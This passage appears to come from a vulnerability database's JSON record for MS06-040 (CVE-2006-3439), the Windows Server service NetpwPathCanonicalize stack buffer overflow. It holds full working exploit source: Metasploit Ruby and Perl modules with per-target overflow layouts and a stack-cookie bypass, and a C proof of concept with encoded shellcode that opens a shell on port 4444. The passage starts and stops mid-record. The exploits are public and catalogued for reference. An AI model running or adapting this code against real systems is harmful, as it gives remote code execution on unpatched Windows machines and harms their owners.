...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\t#\r\n\t\t# /* Function 0x1f at 0x767e912c */\r\n\t\t# long function_1f (\r\n\t\t# [in] [unique] [string] wchar_t * arg_00,\r\n\t\t# [in] [string] wchar_t * arg_01,\r\n\t\t# [out] [size_is(arg_03)] char * arg_02,\r\n\t\t# [in] [range(0, 64000)] long arg_03,\r\n\t\t# [in] [string] wchar_t * arg_04,\r\n\t\t# [in,out] long * arg_05,\r\n\t\t# [in] long arg_06\r\n\t\t# );\r\n\t\t#\r\n\r\n\t\tprint_status(\"Building the stub data...\")\r\n\t\tstub = ''\r\n\r\n\t\tcase mytarget.name\r\n\r\n\t\t# This covers NT 4.0 as well\r\n\t\twhen /wcscpy.*Windows 2000/\r\n\r\n\t\t\tcode = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded\r\n\r\n\t\t\tpath = code + ( [mytarget.ret].pack('V') * 16 ) + \"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(250)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") +\r\n\t\t\t\tNDR.long(rand(250)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\t\twhen /wcscpy.*Windows XP/\r\n\t\t\tpath =\r\n\t\t\t\t# Payload goes first\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\r\n\r\n\t\t\t\t# Land 6 bytes in to bypass garbage (XP SP0)\r\n\t\t\t\t[ mytarget.ret + 6 ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our shellcode (XP SP0)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# Jump straight to shellcode (XP SP1)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our shellcode (XP SP1)\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# Terminate the path\r\n\t\t\t\t\"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\r\n\t\twhen /stack/\r\n\t\t\tbuff = rand_text_alphanumeric(800)\r\n\t\t\tbuff[0, payload.encoded.length] = payload.encoded\r\n\t\t\tbuff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')\r\n\t\t\tbuff[ mytarget['OffsetB'], 5 ] = \"\\xe9\" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')\r\n\r\n\t\t\tpath = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\r\n\t\twhen /wcscpy.*Windows 2003/\r\n\t\t\tpath =\r\n\t\t\t\t# Payload goes first\r\n\t\t\t\tpayload.encoded +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(32) +\r\n\r\n\t\t\t\t# The cookie is constant,\r\n\t\t\t\t# noticed by Nicolas Pouvesle in Misc #28\r\n\t\t\t\t\"\\x4e\\xe6\\x40\\xbb\" +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(4) +\r\n\r\n\t\t\t\t# Jump straight to shellcode\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\r\n\t\t\t\t# Address to write our shellcode\r\n\t\t\t\t[ mytarget.ret ].pack('V') +\r\n\r\n\t\t\t\t# Padding\r\n\t\t\t\trand_text_alphanumeric(40) +\r\n\r\n\t\t\t\t# Terminate the path\r\n\t\t\t\t\"\\x00\\x00\"\r\n\r\n\t\t\tstub =\r\n\t\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(path) +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString('') +\r\n\t\t\t\tNDR.long(rand(0xf0)+1) +\r\n\t\t\t\tNDR.long(0)\r\n\r\n\t\tend\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tdcerpc.call(0x1f, stub, false)\r\n\t\t\tdcerpc.call(0x1f, stub, false)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\trescue => e\r\n\t\t\tif e.to_s !~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\traise e\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Cleanup\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16367/"}, {"lastseen": "2016-01-31T15:53:02", "bulletinFamily": "exploit", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2). CVE-2006-3439. Remote exploit for windows platform", "modified": "2006-08-28T00:00:00", "published": "2006-08-28T00:00:00", "id": "EDB-ID:2265", "href": "https://www.exploit-db.com/exploits/2265/", "type": "exploitdb", "title": "Microsoft Windows - NetpIsRemote Remote Overflow Exploit MS06-040 2", "sourceData": "/*\r\n * MS06-040 Remote Code Execution Proof of Concept\r\n *\r\n * Ported by ub3r st4r aka iRP\r\n * ---------------------------------------------------------------------\r\n * Tested Against:\r\n * Windows XP SP1\r\n * Windows 2000 SP4\r\n *\r\n * Systems Affected:\r\n * Microsoft Windows 2000 SP0-SP4\r\n * Microsoft Windows XP SP0-SP1\r\n * Microsoft Windows NT 4.0\r\n * ---------------------------------------------------------------------\r\n * This is provided as proof-of-concept code only for educational\r\n * purposes and testing by authorized individuals with permission\r\n * to do so.\r\n *\r\n * PRIVATE v.0.2 (08-27-06)\r\n */\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#pragma comment(lib, \"mpr\")\r\n#pragma comment(lib, \"Rpcrt4\")\r\n\r\n// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0\r\nunsigned char DCERPC_Bind_RPC_Service[] =\r\n \"\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\xD0\\x16\\xD0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n \"\\xC8\\x4F\\x32\\x4B\\x70\\x16\\xD3\\x01\\x12\\x78\\x5A\\x47\\xBF\\x6E\\xE1\\x88\"\r\n \"\\x03\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\"\r\n \"\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\r\n\r\n// request windows api: NetprPathCanonicalize (0x1f)\r\nunsigned char DCERPC_Request_RPC_Service[] =\r\n \"\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\\x30\\x08\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\x18\\x08\\x00\\x00\\x00\\x00\\x1f\\x00\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n // path ...\r\n\r\nunsigned char DCERPC_Request_RPC_Service_[] =\r\n \"\\xfa\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\xfa\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nunsigned char sc[] =\r\n \"\\x6a\\x51\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa8\\x97\\x90\"\r\n \"\\x88\\x83\\xeb\\xfc\\xe2\\xf4\\x29\\x53\\x6f\\x67\\x57\\x68\\xd4\\x74\\xc2\\x7c\"\r\n \"\\xdd\\x60\\x51\\x68\\x6f\\x77\\xc8\\x1c\\xfc\\xac\\x8c\\x1c\\xd5\\xb4\\x23\\xeb\"\r\n \"\\x95\\xf0\\xa9\\x78\\x1b\\xc7\\xb0\\x1c\\xcf\\xa8\\xa9\\x7c\\xd9\\x03\\x9c\\x1c\"\r\n \"\\x91\\x66\\x99\\x57\\x09\\x24\\x2c\\x57\\xe4\\x8f\\x69\\x5d\\x9d\\x89\\x6a\\x7c\"\r\n \"\\x64\\xb3\\xfc\\xb3\\xb8\\xfd\\x4d\\x1c\\xcf\\xac\\xa9\\x7c\\xf6\\x03\\xa4\\xdc\"\r\n \"\\x1b\\xd7\\xb4\\x96\\x7b\\x8b\\x84\\x1c\\x19\\xe4\\x8c\\x8b\\xf1\\x4b\\x99\\x4c\"\r\n \"\\xf4\\x03\\xeb\\xa7\\x1b\\xc8\\xa4\\x1c\\xe0\\x94\\x05\\x1c\\xd0\\x80\\xf6\\xff\"\r\n \"\\x1e\\xc6\\xa6\\x7b\\xc0\\x77\\x7e\\xf1\\xc3\\xee\\xc0\\xa4\\xa2\\xe0\\xdf\\xe4\"\r\n \"\\xa2\\xd7\\xfc\\x68\\x40\\xe0\\x63\\x7a\\x6c\\xb3\\xf8\\x68\\x46\\xd7\\x21\\x72\"\r\n \"\\xf6\\x09\\x45\\x9f\\x92\\xdd\\xc2\\x95\\x6f\\x58\\xc0\\x4e\\x99\\x7d\\x05\\xc0\"\r\n \"\\x6f\\x5e\\xfb\\xc4\\xc3\\xdb\\xfb\\xd4\\xc3\\xcb\\xfb\\x68\\x40\\xee\\xc0\\x86\"\r\n \"\\xcc\\xee\\xfb\\x1e\\x71\\x1d\\xc0\\x33\\x8a\\xf8\\x6f\\xc0\\x6f\\x5e\\xc2\\x87\"\r\n \"\\xc1\\xdd\\x57\\x47\\xf8\\x2c\\x05\\xb9\\x79\\xdf\\x57\\x41\\xc3\\xdd\\x57\\x47\"\r\n \"\\xf8\\x6d\\xe1\\x11\\xd9\\xdf\\x57\\x41\\xc0\\xdc\\xfc\\xc2\\x6f\\x58\\x3b\\xff\"\r\n \"\\x77\\xf1\\x6e\\xee\\xc7\\x77\\x7e\\xc2\\x6f\\x58\\xce\\xfd\\xf4\\xee\\xc0\\xf4\"\r\n \"\\xfd\\x01\\x4d\\xfd\\xc0\\xd1\\x81\\x5b\\x19\\x6f\\xc2\\xd3\\x19\\x6a\\x99\\x57\"\r\n \"\\x63\\x22\\x56\\xd5\\xbd\\x76\\xea\\xbb\\x03\\x05\\xd2\\xaf\\x3b\\x23\\x03\\xff\"\r\n \"\\xe2\\x76\\x1b\\x81\\x6f\\xfd\\xec\\x68\\x46\\xd3\\xff\\xc5\\xc1\\xd9\\xf9\\xfd\"\r\n \"\\x91\\xd9\\xf9\\xc2\\xc1\\x77\\x78\\xff\\x3d\\x51\\xad\\x59\\xc3\\x77\\x7e\\xfd\"\r\n \"\\x6f\\x77\\x9f\\x68\\x40\\x03\\xff\\x6b\\x13\\x4c\\xcc\\x68\\x46\\xda\\x57\\x47\"\r\n \"\\xf8\\x67\\x66\\x77\\xf0\\xdb\\x57\\x41\\x6f\\x58\";\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n HANDLE hFile;\r\n NETRESOURCE nr;\r\n\r\n char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];\r\n\r\n unsigned int i;\r\n\r\n unsigned char szInBuf[4096];\r\n unsigned long dwRead, nWritten;\r\n\r\n unsigned char szReqBuf[2096];\r\n\r\n if (argc < 3){\r\n printf(\"[-] Usage: ms06040poc <host> [target]\\n\");\r\n printf(\"\\t1 - Windows 2000 SP0-SP4\\n\");\r\n printf(\"\\t2 - Windows XP SP0-SP1\\n\");\r\n return -1;\r\n }\r\n\r\n memset(szReqBuf, 0, sizeof(szReqBuf));\r\n\r\n if (atoi(argv[2]) == 1) {\r\n unsigned char szBuff[1064];\r\n\r\n // build payload buffer\r\n memset(szBuff, '\\x90', 1000);\r\n memcpy(szBuff+630, sc, sizeof(sc));\r\n\r\n for(i=1000; i<1064; i+=4) {\r\n memcpy(szBuff+i, \"\\x04\\x08\\x02\\x00\", 4);\r\n }\r\n\r\n // build request buffer\r\n memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);\r\n memcpy(szReqBuf+44, \"\\x15\\x02\\x00\\x00\", 4); /* max count */\r\n memcpy(szReqBuf+48, \"\\x00\\x00\\x00\\x00\", 4); /* offset */\r\n memcpy(szReqBuf+52, \"\\x15\\x02\\x00\\x00\", 4); /* actual count */\r\n memcpy(szReqBuf+56, szBuff, sizeof(szBuff));\r\n memcpy(szReqBuf+1120, \"\\x00\\x00\\x00\\x00\", 4); /* align string */\r\n memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);\r\n memcpy(szReqBuf+1140 , \"\\xeb\\x02\", 2);\r\n }\r\n if (atoi(argv[2]) == 2) {\r\n unsigned char szBuff[708];\r\n\r\n memset(szBuff, '\\x90', 612); /* size of shellcode */\r\n memcpy(szBuff, sc, sizeof(sc));\r\n\r\n memcpy(szBuff+612, \"\\x0a\\x08\\x02\\x00\", 4);\r\n memset(szBuff+616, 'A', 8); // 8 bytes padding\r\n memcpy(szBuff+624, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+628, '\\x90', 32);\r\n memcpy(szBuff+660, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+664, 'B', 8); // 8 bytes padding\r\n memcpy(szBuff+672, \"\\x04\\x08\\x02\\x00\", 4);\r\n memset(szBuff+676, '\\x90', 32);\r\n\r\n // build request buffer\r\n memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);\r\n memcpy(szReqBuf+44, \"\\x63\\x01\\x00\\x00\", 4); /* max count */\r\n memcpy(szReqBuf+48, \"\\x00\\x00\\x00\\x00\", 4); /* offset */\r\n memcpy(szReqBuf+52, \"\\x63\\x01\\x00\\x00\", 4); /* actual count */\r\n memcpy(szReqBuf+56, szBuff, sizeof(szBuff));\r\n memcpy(szReqBuf+764, \"\\x00\\x00\\x00\\x00\", 4); /* align string */\r\n memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);\r\n }\r\n\r\n printf(\"[+] Connecting to %s ... \\n\", argv[1]);\r\n\r\n _snprintf(szRemoteName, sizeof(szRemoteName), \"\\\\\\\\%s\\\\ipc$\", argv[1]);\r\n nr.dwType = RESOURCETYPE_ANY;\r\n nr.lpLocalName = NULL;\r\n nr.lpProvider = NULL;\r\n nr.lpRemoteName = szRemoteName;\r\n if (WNetAddConnection2(&nr, \"\", \"\", 0) != NO_ERROR) {\r\n printf(\"[-] Failed to connect to host !\\n\");\r\n return -1;\r\n }\r\n\r\n _snprintf(szPipePath, sizeof(szPipePath), \"\\\\\\\\%s\\\\pipe\\\\browser\", argv[1]);\r\n hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);\r\n\r\n if (hFile == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to open named pipe !\\n\");\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Binding to RPC interface ... \\n\");\r\n if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {\r\n printf(\"[-] Failed to bind to interface !\\n\");\r\n CloseHandle(hFile);\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Sending RPC request ... \\n\");\r\n if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {\r\n printf(\"[-] Unable to transmit RPC request !\\n\");\r\n CloseHandle(hFile);\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Now check for shell on %s:4444 !\\n\", argv[1]);\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2006-08-28]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2265/"}, {"lastseen": "2016-01-31T16:04:50", "bulletinFamily": "exploit", "description": "MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3). CVE-2006-3439. Remote exploit for windows platform", "modified": "2006-09-13T00:00:00", "published": "2006-09-13T00:00:00", "id": "EDB-ID:2355", "href": "https://www.exploit-db.com/exploits/2355/", "type": "exploitdb", "title": "Microsoft Windows 2003 - NetpIsRemote Remote Overflow Exploit MS06-040", "sourceData": "#########################################################################\r\n# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)\r\n#\r\n# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>\r\n#\r\n# http://sf-freedom.blogspot.com\r\n# \r\n# For educational purpose only\r\n#\r\n# Note: This exploit is developed because of my question \"Is it exploitable\r\n# on Windows Server 2003 platform ?\". As I know, Windows XP SP2 and Windows\r\n# Server 2003 SP1 is not exploitable because they are compiled with /GS, but\r\n# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there\r\n# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not \r\n# exploitable ? There is Stack Protection Windows Server 2003, is this the\r\n# reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ?\r\n#\r\n# I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him\r\n# ^-^) and work on it. The problem is the Stack Protection \"security cookie \r\n# checking\". Because wcscpy() method allow me to write to any memory location\r\n# that are marked writable, I decide to write to the location at \"security\r\n# cookie\" is stored and it works !!! I will describe more implementation details\r\n# in my blog in few days ^-^ \r\n#\r\n# This exploit tested on Windows Server 2003 SP0 build 3790 and successful \r\n# exploit 2003 machine in my environment - all patch before MS06-040 \r\n# (KB921883). It's quite reliable but not 100%. There is the possibility that\r\n# the exploit will fail and the target system process crash. Because I have \r\n# only one testbase system, I couldn't confirm this exploit will work on \r\n# your environment. However feel free to e-mail to me.\r\n#\r\n# Credits: H D Moore\r\n#########################################################################\r\n\r\npackage Msf::Exploit::netapi_win2003;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\n\r\nuse Pex::DCERPC;\r\nuse Pex::NDR;\r\n\r\nmy $advanced = {\r\n\t'FragSize' => [ 256, 'The DCERPC fragment size' ],\r\n\t'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],\r\n\t'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],\r\n };\r\n\r\nmy $info = {\r\n\t'Name' => 'MSO6-040 Windows Server 2003 Target',\r\n\t'Version' => '',\r\n\t'Authors' =>\r\n\t [\r\n\t\t'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',\r\n\t ],\r\n\r\n\t'Arch' => ['x86'],\r\n\t'OS' => [ 'win32', 'win2003' ],\r\n\t'Priv' => 1,\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [ 1, 'ADDR', 'The target address' ],\r\n\r\n\t\t# SMB connection options\r\n\t\t'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],\r\n\t\t'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],\r\n\t\t'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],\r\n\t },\r\n\r\n\t'Payload' =>\r\n\t {\r\n\t \t# Technically we can use more space than this, but by limiting it\r\n\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t'Space' => 370,\r\n\t\t\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\r\n\t\t# sub esp, 4097 + inc esp makes stack happy\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(\r\n\t\tqq{\r\n\t\tThis exploit modified from netapi_ms06_040.pm (Metasploit).\r\n\t\tWhile netapi_ms06_040 of metasploit works on Windows 2000 \r\n\t\tSP0 - SP4 and Windows XP SP0 - SP1, this exploit works on\r\n\t\tWindows Server 2003 SP0.\r\n\t }\r\n\t ),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t[ 'BID', '19409' ],\r\n\t\t[ 'CVE', '2006-3439' ],\r\n\t\t[ 'MSB', 'MS06-040' ],\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\t'Targets' =>\r\n\t [\r\n\t\t[ '(wcscpy) Windows Server 2003 SP0', 612],\r\n\t ],\r\n\r\n\t'Keys' => ['srvsvc'],\r\n\r\n\t'DisclosureDate' => '',\r\n };\r\n\r\nsub new {\r\n\tmy ($class) = @_;\r\n\tmy $self =\r\n\t $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );\r\n\treturn ($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy ($self) = @_;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target_name = '*SMBSERVER';\r\n\r\n\tmy $FragSize = $self->GetVar('FragSize') || 256;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (!$self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"Could not initialize the nop module\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy ( $res, $rpc );\r\n\r\n\tmy $pipe = '\\BROWSER';\r\n\tmy $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188';\r\n\tmy $version = '3.0';\r\n\r\n\tmy $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );\r\n\r\n\tmy $dce = Pex::DCERPC->new(\r\n\t\t'handle' => $handle,\r\n\t\t'username' => $self->GetVar('SMBUSER'),\r\n\t\t'password' => $self->GetVar('SMBPASS'),\r\n\t\t'domain' => $self->GetVar('SMBDOM'),\r\n\t\t'fragsize' => $self->GetVar('FragSize'),\r\n\t\t'bindevasion' => $self->GetVar('BindEvasion'),\r\n\t\t'directsmb' => $self->GetVar('DirectSMB'),\r\n\t );\r\n\r\n\tif ( !$dce ) {\r\n\t\t$self->PrintLine(\"[*] Could not bind to $handle\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $smb = $dce->{'_handles'}{$handle}{'connection'};\r\n\t\r\n\tif (! $smb) {\r\n\t\t$self->PrintLine(\"[*] Could not establish SMB session\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $stub;\r\n\r\n\t#\r\n\t# Use the wcscpy() method on Windows Server 2003 SP0\r\n\t#\t\r\n\tif ($target->[0] =~ /2003/) {\r\n\r\n\t\tmy $path = \t\r\n\t\t\t$shellcode.\r\n\r\n\t\t\t# Padding\r\n\t\t\tPex::Text::AlphaNumText($target->[1] - length($shellcode)).\r\n\t\t\tPex::Text::AlphaNumText(32).\r\n\t\t\tsubstr($shellcode, 0, 4).\t# cookie\r\n\t\t\tPex::Text::AlphaNumText(4).\r\n\t\t\t# return address == address that store security cookie\r\n\t\t\t(\"\\xec\\xc1\\xc8\\x71\") . \r\n\t\t\tPex::Text::AlphaNumText(8).\r\n\r\n\t\t\t(\"\\xec\\xc1\\xc8\\x71\" x 2) .\r\n\t\t\tPex::Text::AlphaNumText(36).\r\n\r\n\t\t\t# Terminate\r\n\t\t\t\"\\x00\\x00\";\r\n\r\n\r\n\t\t# Package that into a stub\r\n\t\t$stub =\r\n\t\t\tPex::NDR::Long(int(rand(0xffffffff))).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::UnicodeConformantVaryingStringPreBuilt($path).\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::UnicodeConformantVaryingString('').\r\n\t\t\tPex::NDR::Long(int(rand(250)+1)).\r\n\t\t\tPex::NDR::Long(0);\r\n\t}\r\n\telse {\r\n\t\t$self->PrintLine(\"This target is not currently supported\");\r\n\t\treturn;\r\n\t}\r\n\r\n\r\n\t$self->PrintLine(\"[*] Sending request...\");\r\n\t\r\n\t# Function 0x1f is not the only way to exploit this :-)\r\n\tmy @response = $dce->request( $handle, 0x1f, $stub );\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] The server rejected it, trying again...\");\r\n\t\t@response = $dce->request( $handle, 0x1f, $stub );\r\n\t}\r\n\t\r\n\tif ( length($dce->{'response'}->{'StubData'}) > 0) {\r\n\t\t$self->PrintLine(\"[*] Exploit Failed\");\r\n\t}\r\n\t\r\n\tif (@response) {\r\n\t\t$self->PrintLine('[*] RPC server responded with:');\r\n\t\tforeach my $line (@response) {\r\n\t\t\t$self->PrintLine( '[*] ' . $line );\r\n\t\t}\r\n\t}\r\n\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-09-13]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2355/"}], "metasploit": [{"lastseen": "2019-10-11T19:55:30", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n", "modified": "2017-07-24T13:26:21", "published": "2006-09-13T06:49:39", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS06_040_NETAPI", "href": "", "type": "metasploit", "title": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n },\n 'Author' =>\n [\n 'hdm'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-3439' ],\n [ 'OSVDB', '27845' ],\n [ 'BID', '19409' ],\n [ 'MSB', 'MS06-040' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n # Technically we can use more space than this, but by limiting it\n # to 370 bytes we can use the same request for all Windows SPs.\n 'Space' => 370,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 